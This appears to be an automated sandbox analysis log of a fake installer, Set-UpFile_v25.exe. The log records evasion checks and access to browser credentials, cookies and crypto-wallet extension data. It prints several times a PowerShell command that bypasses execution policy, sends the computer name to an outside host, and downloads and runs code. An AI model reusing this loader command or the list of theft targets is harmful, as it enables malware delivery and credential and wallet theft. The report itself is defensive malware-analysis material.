            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Set-UpFile_v25.exe Static file information: File size 75060322 > 1048576
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1981135607.0000000006D0A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1981556253.0000000006D85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbl source: powershell.exe, 00000004.00000002.1981556253.0000000006D85000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Code function: 0_2_02995E52 push ebx; retn 0002h 0_2_02995E5C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06F81B1D push esp; iretd 4_2_06F81BBD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06F81AE4 push ebp; iretd 4_2_06F81AEA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06F81DDF push edx; iretd 4_2_06F81DE5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06F81D79 push ebx; iretd 4_2_06F81D7F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06F81D5A push ebx; iretd 4_2_06F81D60
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06F81D21 push ebx; iretd 4_2_06F81D27
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | System information queried: FirmwareTableInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4662
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1715
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe TID: 7396 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7668 | Thread sleep count: 4662 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672 | Thread sleep count: 1715 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720 | Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692 | Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1790726742.000000000083B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Code function: 0_2_02980375 mov edx, dword ptr fs:[00000030h] | 0_2_02980375
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Code function: 0_2_02980935 mov eax, dword ptr fs:[00000030h] | 0_2_02980935
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Code function: 0_2_02980F84 mov eax, dword ptr fs:[00000030h] | 0_2_02980F84
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Code function: 0_2_02980F85 mov eax, dword ptr fs:[00000030h] | 0_2_02980F85
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Code function: 0_2_02980CE5 mov eax, dword ptr fs:[00000030h] | 0_2_02980CE5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908751924.0000000000828000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1908751924.0000000000831000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000828000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1908751924.0000000000846000.00000004.00000020.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1958807611.0000000000845000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: Process Memory Space: Set-UpFile_v25.exe PID: 7272, type: MEMORYSTR
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s/Electrum-LTCm F
            Source: Set-UpFile_v25.exe, 00000000.00000003.1958807611.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s/ElectronCash6\H>
            Source: Set-UpFile_v25.exe, 00000000.00000003.1790726742.0000000000889000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
            Source: Set-UpFile_v25.exe, 00000000.00000002.1962678644.000000000086D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908978246.0000000000893000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908978246.0000000000893000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: jfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkfgppdlbmlmnp
            Source: Set-UpFile_v25.exe, 00000000.00000003.1908978246.0000000000893000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: locpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["k
            Source: powershell.exe, 00000004.00000002.1983244508.0000000007040000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
